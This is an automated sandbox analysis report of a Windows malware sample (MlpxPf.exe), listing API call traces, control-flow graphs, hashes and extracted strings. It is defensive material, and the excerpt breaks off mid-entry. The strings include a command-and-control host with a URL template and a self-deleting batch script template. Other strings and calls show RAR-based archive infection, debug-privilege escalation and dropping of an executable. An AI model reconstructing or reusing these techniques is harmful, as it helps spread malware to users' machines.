                                    • lstrlen.KERNEL32(?), ref: 005915D2
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 005915EE
                                    • WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 00591609
                                    • CloseHandle.KERNEL32(00000000), ref: 00591612
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0059162D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                    • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$open
                                    • API String ID: 617340118-3616273218
                                    • Opcode ID: 090cf4b16c50e779d286ac20ac758fbca9271638f351719d5bc49116bcb780ab
                                    • Instruction ID: 23bc0d3bb4ec20c8dc7d5990edc71b3e4bf9406e96e58e160032739df47f48eb
                                    • Opcode Fuzzy Hash: 090cf4b16c50e779d286ac20ac758fbca9271638f351719d5bc49116bcb780ab
                                    • Instruction Fuzzy Hash: 13112176A01128BADB2097A5DC8DDEB7E7CEF59751F010052F549E2050EA709F89DBB0

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0059164F
                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0059165B
                                    • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,00000104), ref: 0059166E
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 005916AC
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 005916BD
                                      • Part of subcall function 0059139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 005913BC
                                      • Part of subcall function 0059139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 005913DA
                                      • Part of subcall function 0059139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00591448
                                    • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 005916E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MlpxPf.exe$C:\Windows\system32$Documents and Settings
                                    • API String ID: 123563730-474348920
                                    • Opcode ID: a9f44eb90496bbdf3dd6c0652dd04fe544d9e0365e9cbce5149c9617ddec7a75
                                    • Instruction ID: 85562dbeed94f0dadc56d4c61a22c19c87a70770c962c9941709655f764bcae9
                                    • Opcode Fuzzy Hash: a9f44eb90496bbdf3dd6c0652dd04fe544d9e0365e9cbce5149c9617ddec7a75
                                    • Instruction Fuzzy Hash: 56110471901236FBDF206BA4ED4EE9F3E6DFB61361F020012F20A911A0D6758D49EBB5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 220 591000-591023 CreateFileA 221 591092-591096 220->221 222 591025-591055 GetFileSize CreateFileMappingA MapViewOfFile 220->222 223 59107b-591085 222->223 224 591057-59105f 222->224 225 59108d-591091 CloseHandle 223->225 226 591087-59108b CloseHandle 223->226 227 591061-59106e call 5917d0 224->227 228 591074-591075 UnmapViewOfFile 224->228 225->221 226->225 227->228 228->223
                                    APIs
                                    • CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGY,http://%s:%d/%s/%s,005910E8,?), ref: 00591018
                                    • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76C08400), ref: 00591029
                                    • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00591038
                                    • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 0059104B
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00591075
                                    • CloseHandle.KERNEL32(?), ref: 0059108B
                                    • CloseHandle.KERNEL32(00000000), ref: 0059108E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                    • String ID: HGY$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1223616889-1359388518
                                    • Opcode ID: 6a87901f3ee1a0e98c3ca330ee037fa65d71c94a5c4b82d1d384034afb1bb5a1
                                    • Instruction ID: a298f6b3a1cd53c5f8e9a4a2a7804560187bac1edad6cc10b40b1df4f75a15f5
                                    • Opcode Fuzzy Hash: 6a87901f3ee1a0e98c3ca330ee037fa65d71c94a5c4b82d1d384034afb1bb5a1
                                    • Instruction Fuzzy Hash: 7201967110075DFFE7305F609C8DE2BBBACEB447D9F05452AF245A2090D6715E489B74

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 378 592b8c-592bc6 memset GetLogicalDriveStringsA 379 592c09-592c28 WaitForMultipleObjects 378->379 380 592bc8-592bcc 378->380 383 592c2a-592c3a CreateThread 379->383 384 592c3c-592c45 379->384 381 592bfa-592c07 lstrlen 380->381 382 592bce-592bd0 380->382 381->379 381->380 382->381 385 592bd2-592bdc GetDriveTypeA 382->385 383->384 385->381 386 592bde-592be1 385->386 386->381 387 592be3-592bf6 CreateThread 386->387 387->381
                                    APIs
                                    • memset.MSVCRT ref: 00592BA6
                                    • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00592BB4
                                    • GetDriveTypeA.KERNELBASE(?), ref: 00592BD3
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00592BEE
                                    • lstrlen.KERNEL32(?), ref: 00592BFB
                                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00592C16
                                    • CreateThread.KERNELBASE(00000000,00000000,00592845,00000000,00000000,00000000), ref: 00592C3A
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                    • String ID:
                                    • API String ID: 1073171358-0
                                    • Opcode ID: 982b0ad1677f660994394a2643f4321f4380578d8dae3847c1cbcfcbc69f1b8b
                                    • Instruction ID: 657f4037e47a8ef75c5c4dcfd87097a822f6a4d8a2a7ade6045e553883126e43
                                    • Opcode Fuzzy Hash: 982b0ad1677f660994394a2643f4321f4380578d8dae3847c1cbcfcbc69f1b8b
                                    • Instruction Fuzzy Hash: 3121C3B180014CBFEB20AF649C88EEE7FADFB15344F150126F85292151D7209D0ADF61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 388 592c48-592c75 memset call 591973 391 592cb2-592cb9 388->391 392 592c77-592c7f 388->392 393 592cc8-592ccc 391->393 394 592cbb-592cc2 VirtualFree 391->394 395 592c8f-592cac CreateThread WaitForMultipleObjects 392->395 396 592c81-592c8b 392->396 394->393 395->391 396->395
                                    APIs
                                    • memset.MSVCRT ref: 00592C57
                                      • Part of subcall function 00591973: PathFileExistsA.KERNELBASE(\NY`NY,00000000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00591992
                                      • Part of subcall function 00591973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005919BA
                                      • Part of subcall function 00591973: Sleep.KERNEL32(00000064), ref: 005919C6
                                      • Part of subcall function 00591973: wsprintfA.USER32 ref: 005919EC
                                      • Part of subcall function 00591973: CopyFileA.KERNEL32(?,?,00000000), ref: 00591A00
                                      • Part of subcall function 00591973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00591A1E
                                      • Part of subcall function 00591973: GetFileSize.KERNEL32(?,00000000), ref: 00591A2C
                                      • Part of subcall function 00591973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00591A46
                                      • Part of subcall function 00591973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00591A65
                                    • CreateThread.KERNELBASE(00000000,00000000,00592B8C,00000000,00000000,00000000), ref: 00592C99
                                    • WaitForMultipleObjects.KERNEL32(00000001,005916BA,00000001,000000FF,?,005916BA,00000000), ref: 00592CAC
                                    • VirtualFree.KERNELBASE(01230000,00000000,00008000,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,00594E5C,00594E60,?,005916BA,00000000), ref: 00592CC2
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00592C69
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                    • API String ID: 2042498389-2612645121
                                    • Opcode ID: 5a9f21994526af90c83d1f0078ab98c858c872ad06a9e17665c91a150844b463
                                    • Instruction ID: 9c1ff53bb20c4286c947473fd30e32e669e3bcb46e33305d512f5659f71c1bb2
                                    • Opcode Fuzzy Hash: 5a9f21994526af90c83d1f0078ab98c858c872ad06a9e17665c91a150844b463
                                    • Instruction Fuzzy Hash: 11018B71641224BADF10EBA5EC1EEAF7EACFF51B60F104121BA05D61C1E6A09E04CBE1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 397 592845-592855 call 59274a 400 592878-59288a DeleteFileA 397->400 401 592857 397->401 402 59289a-5928a2 400->402 403 59288c-592894 VirtualFree 400->403 404 592865-592876 call 592692 401->404 405 5928ab-5928b5 402->405 406 5928a4-5928a5 CloseHandle 402->406 403->402 404->400 409 592859-592860 call 59239d 404->409 406->405 409->404
                                    APIs
                                      • Part of subcall function 0059274A: memset.MSVCRT ref: 00592766
                                      • Part of subcall function 0059274A: memset.MSVCRT ref: 00592774
                                      • Part of subcall function 0059274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00592787
                                      • Part of subcall function 0059274A: wsprintfA.USER32 ref: 005927AB
                                      • Part of subcall function 0059274A: wsprintfA.USER32 ref: 005927C6
                                      • Part of subcall function 0059274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\08660606.exe,00000000), ref: 005927D4
                                      • Part of subcall function 0059274A: wsprintfA.USER32 ref: 005927F4
                                      • Part of subcall function 0059274A: DeleteFileA.KERNEL32(?,?,00594E54,00594E58), ref: 0059281A
                                      • Part of subcall function 0059274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00594E54,00594E58), ref: 00592832
                                    • DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\08660606.exe), ref: 0059287D
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00592894
                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 005928A5
                                      • Part of subcall function 00592692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7556E800,?,?,005929DB,?,00000001), ref: 005926A7
                                      • Part of subcall function 00592692: WaitForSingleObject.KERNEL32(00000000,000000FF,7556E800,?,?,005929DB,?,00000001), ref: 005926B5
                                      • Part of subcall function 00592692: lstrlen.KERNEL32(?), ref: 005926C4
                                      • Part of subcall function 00592692: ??2@YAPAXI@Z.MSVCRT ref: 005926CE
                                      • Part of subcall function 00592692: lstrcpy.KERNEL32(00000004,?), ref: 005926E3
                                      • Part of subcall function 00592692: SetEvent.KERNEL32 ref: 0059273C
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\08660606.exe, xrefs: 00592878
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
                                    • String ID: C:\Users\user\AppData\Local\Temp\08660606.exe
                                    • API String ID: 2533558932-3412602479
                                    • Opcode ID: d6a5156caa767a148b6e47999ed69a925ced48cef80f6dbd21ea8bad08d8ac87
                                    • Instruction ID: e554bae27c190f202b45775ee6288dd92b024ddf5435f9788ac33738dbab6d54
                                    • Opcode Fuzzy Hash: d6a5156caa767a148b6e47999ed69a925ced48cef80f6dbd21ea8bad08d8ac87
                                    • Instruction Fuzzy Hash: 02F0BE78200304BBDF20A7B5EC8EF5A3B6CBB20300F010922B605E20E0DBB8DC599E51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 411 5914e1-5914fb 412 5914fd-591510 GetModuleHandleA 411->412 413 591541-591547 411->413 414 59151a-591535 VirtualQuery 412->414 415 591512-591518 412->415 416 591549-59154c 413->416 417 591573-59157a call 591638 ExitProcess 413->417 419 59153b 414->419 420 591537-591539 414->420 415->413 421 591569-591570 416->421 422 59154e-591555 416->422 419->413 420->413 420->419 422->421 423 591557-591566 call 591af9 422->423 423->421
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00591504
                                    • VirtualQuery.KERNEL32(005914E1,?,0000001C), ref: 00591525
                                    • ExitProcess.KERNEL32 ref: 0059157A
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: ExitHandleModuleProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 3946701194-0
                                    • Opcode ID: 4f9d6c1e1a217fd6bea8abec76ea81ef0ff85facd359a123257b1529479296e4
                                    • Instruction ID: e7ea35f7ebcf656831289a35d58cbb2692ca79c9b99488bec0646c4b61184f03
                                    • Opcode Fuzzy Hash: 4f9d6c1e1a217fd6bea8abec76ea81ef0ff85facd359a123257b1529479296e4
                                    • Instruction Fuzzy Hash: 8B115E75900726DFCF20DFA5A888A797BA8FBA4750B13402BF402D3250D2388E46AF54
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 005960DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00596189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005961A5
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Virtual$Free$Alloc
                                    • String ID:
                                    • API String ID: 1852963964-0
                                    • Opcode ID: e58d222e568507a0ca67a0397b30dddf0b980b0dc36f1c7111d56bcfc4e05868
                                    • Instruction ID: d2219569b59ac13a85aee85e96c122d996e72ca380f45a67b80a5c6b3d2606c3
                                    • Opcode Fuzzy Hash: e58d222e568507a0ca67a0397b30dddf0b980b0dc36f1c7111d56bcfc4e05868
                                    • Instruction Fuzzy Hash: 29118C32A00A49CFCF348F58CC817DD3BA2FF44300F690428DE8AAB291DB716948CB84
                                    APIs
                                    • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,?,?,005913EF), ref: 005911AB
                                    • OpenProcessToken.ADVAPI32(00000000,00000028,005913EF,?,?,?,?,?,?,005913EF), ref: 005911BB
                                    • AdjustTokenPrivileges.ADVAPI32(005913EF,00000000,?,00000010,00000000,00000000), ref: 005911EB
                                    • CloseHandle.KERNEL32(005913EF), ref: 005911FA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,005913EF), ref: 00591203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 005911A5
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                    • API String ID: 75692138-2612645121
                                    • Opcode ID: 640bfa30f255cd8336b93d2bb74ea013aed0a9de0b1b4fc76e0f2e7c1b81fb16
                                    • Instruction ID: b593b61bf6890ea86991a3f3af6da56687f9675b5dc2d4546f2cfa36da1c8998
                                    • Opcode Fuzzy Hash: 640bfa30f255cd8336b93d2bb74ea013aed0a9de0b1b4fc76e0f2e7c1b81fb16
                                    • Instruction Fuzzy Hash: 3401E4B5900209FFDB00DFE5CD89AAEBFB8FB14305F10446AE606A2250D7719F48EB50
                                    APIs
                                    • strstr.MSVCRT ref: 005923CC
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00592464
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00592472
                                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 005924A8
                                    • memset.MSVCRT ref: 005924B9
                                    • strrchr.MSVCRT ref: 005924C9
                                    • wsprintfA.USER32 ref: 005924DE
                                    • strrchr.MSVCRT ref: 005924ED
                                    • memset.MSVCRT ref: 005924F2
                                    • memset.MSVCRT ref: 00592505
                                    • wsprintfA.USER32 ref: 00592524
                                    • Sleep.KERNEL32(000007D0), ref: 00592535
                                    • Sleep.KERNEL32(000007D0), ref: 0059255D
                                    • memset.MSVCRT ref: 0059256E
                                    • wsprintfA.USER32 ref: 00592585
                                    • memset.MSVCRT ref: 005925A6
                                    • wsprintfA.USER32 ref: 005925CA
                                    • Sleep.KERNEL32(000007D0), ref: 005925D0
                                    • Sleep.KERNEL32(000007D0,?,?), ref: 005925E5
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005925FC
                                    • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00592611
                                    • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00592642
                                    • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0059265B
                                    • SetEndOfFile.KERNEL32 ref: 0059266D
                                    • CloseHandle.KERNEL32(00000000), ref: 00592676
                                    • RemoveDirectoryA.KERNEL32(?), ref: 00592681
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                    • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\08660606.exe
                                    • API String ID: 2203340711-3628705401
                                    • Opcode ID: ee8ff0edd9bfa623fca1eadf4c9b7d75966adfb8b85b757e24259d1afaae031b
                                    • Instruction ID: 76e7c0597b4a9b944d212ab86e25cad8db67a51091f613513399b002ac2ece87
                                    • Opcode Fuzzy Hash: ee8ff0edd9bfa623fca1eadf4c9b7d75966adfb8b85b757e24259d1afaae031b
                                    • Instruction Fuzzy Hash: B6817EB1508345BBDB10DF60DC89EABBBECFB98704F00091AF685D21A0D7749A49DB66
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00591400), ref: 00591226
                                    • GetProcAddress.KERNEL32(00000000), ref: 0059122D
                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00591400), ref: 0059123F
                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00591400), ref: 00591250
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00591400), ref: 0059129E
                                    • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00591400), ref: 005912B0
                                    • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00591400), ref: 005912F5
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00591400), ref: 0059130A
                                    Strings
                                    • ntdll.dll, xrefs: 00591219
                                    • ZwQuerySystemInformation, xrefs: 00591212
                                    • C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00591262
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                    • String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$ZwQuerySystemInformation$ntdll.dll
                                    • API String ID: 1500695312-4221281799
                                    • Opcode ID: 6c7aa24fa86b6947f917f244e3f875d8c595ec5ff8616aec807f6b92345358e2
                                    • Instruction ID: 1fc4b0d754f5f649a2251dc918e01fafac13c1c7f1bae284295149446d38e1f2
                                    • Opcode Fuzzy Hash: 6c7aa24fa86b6947f917f244e3f875d8c595ec5ff8616aec807f6b92345358e2
                                    • Instruction Fuzzy Hash: A121E635605722EBDF20AF66CC08B6BBEA8FB85B40F450929F546D6240C770DA44C7A9
                                    APIs
                                    • memset.MSVCRT ref: 005918B1
                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75570F00,76C08400), ref: 005918D3
                                    • CloseHandle.KERNEL32(I%Y), ref: 005918E9
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005918F0
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00591901
                                    • CloseHandle.KERNEL32(?), ref: 0059190A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true
                                    • Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                    • String ID: I%Y
                                    • API String ID: 876959470-2051954410
                                    • Opcode ID: a3ed713327dd86198ab15e2a7750a04e575460cae18a94c5bedc0435de3dd842
                                    • Instruction ID: 2e58b757e83add939923b112a99be8fea6f01cfb2e5c7dfbb729e374773c1ac7
                                    • Opcode Fuzzy Hash: a3ed713327dd86198ab15e2a7750a04e575460cae18a94c5bedc0435de3dd842
                                    • Instruction Fuzzy Hash: A0017C72901128BBCF21AB96DC4DDDFBF3DFF85720F104022FA15A51A0D6314A18DAA0
                                    APIs
